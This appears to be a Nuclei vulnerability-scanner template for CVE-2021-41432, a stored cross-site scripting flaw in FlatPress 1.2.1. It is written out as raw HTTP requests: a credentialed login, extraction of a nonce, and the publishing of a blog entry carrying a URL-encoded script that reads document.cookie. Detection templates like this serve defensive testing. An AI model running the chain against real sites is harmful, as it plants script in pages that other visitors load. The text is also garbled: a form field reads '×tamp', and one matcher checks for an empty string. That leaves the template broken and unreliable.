id: CVE-2021-41432 info: name: FlatPress 1.2.1 - Cross-site scripting author: arafatansari severity: medium description: | A stored cross-site scripting (XSS) vulnerability exists in FlatPress 1.2.1 that allows for arbitrary execution of JavaScript commands through blog content. reference: - https://github.com/flatpressblog/flatpress/issues/88 - https://nvd.nist.gov/vuln/detail/CVE-2021-41432 classification: cve-id: CVE-2021-41432 metadata: verified: true shodan-query: http.html:"Flatpress" tags: cve,cve2021,flatpress,xss,authenticated,oss requests: - raw: - | POST /login.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp ------WebKitFormBoundarykGJmx9vKsePrMkVp Content-Disposition: form-data; name="user" {{username}} ------WebKitFormBoundarykGJmx9vKsePrMkVp Content-Disposition: form-data; name="pass" {{password}} ------WebKitFormBoundarykGJmx9vKsePrMkVp Content-Disposition: form-data; name="submit" Login ------WebKitFormBoundarykGJmx9vKsePrMkVp-- - | GET /admin.php?p=entry&action=write HTTP/1.1 Host: {{Hostname}} - | POST /admin.php?p=entry&action=write HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _wpnonce={{nonce}}&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd×tamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish - | GET /index.php/2022/10 HTTP/1.1 Host: {{Hostname}} req-condition: true cookie-reuse: true matchers: - type: dsl dsl: - "contains(body_4, '

')" - "contains(body_4, 'FlatPress')" - "contains(all_headers_4, 'text/html')" - "status_code_4 == 200" condition: and extractors: - type: regex internal: true name: nonce part: body group: 1 regex: - 'name="_wpnonce" value="([0-9a-z]+)" />'